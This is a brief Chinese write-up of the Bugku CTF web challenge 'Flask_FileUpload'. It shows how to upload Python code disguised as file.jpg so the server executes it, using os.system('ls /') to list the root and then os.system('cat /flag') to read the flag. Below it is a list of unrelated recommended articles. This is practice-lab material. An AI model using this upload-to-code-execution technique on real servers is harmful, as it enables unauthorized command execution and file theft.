Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
有一个好名字11 小时前
Agent Loop —— 一切从那个 while 循环开始
前端·javascript·chrome
一天睡25小时11 小时前
Claude Code 指令入门教程
前端
2301_8125396711 小时前
Golang怎么实现网页爬虫抓取数据_Golang如何用colly框架快速构建爬虫采集程序【教程】
jvm·数据库·python
xcbrand11 小时前
政府事业机构品牌策划公司哪家可靠
大数据·人工智能·python
yingyima11 小时前
正则表达式实战:从日志中精准提取关键字段
前端
TeamDev12 小时前
如何在 DotNetBrowser 中使用本地 AI 模型
前端·后端·.net
谢尔登12 小时前
10_从 React Hooks 本质看 useState
前端·ubuntu·react.js
辰同学ovo12 小时前
从全局登录状态管理学习 Redux
前端·javascript·学习·react.js
陈随易12 小时前
2年没用Nodejs了,Bun很香
前端·后端·程序员
donecoding12 小时前
Corepack 完全解析:从懵到懂,包管理器自由了
前端·node.js·前端工程化
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03Codex 接入 DeepSeek API 完整配置文档04零基础教你claude code 接入 deepseek V405【AI】2026 年具身智能模型和世界模型总结06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07几个好用的ip纯净度检测网站082026年AI前瞻:量子AI、具身智能与科学发现的新纪元09CC-Switch & Claude 基于 Linux 服务器安装使用指南10在Windows 11上安装Docker的踩坑记录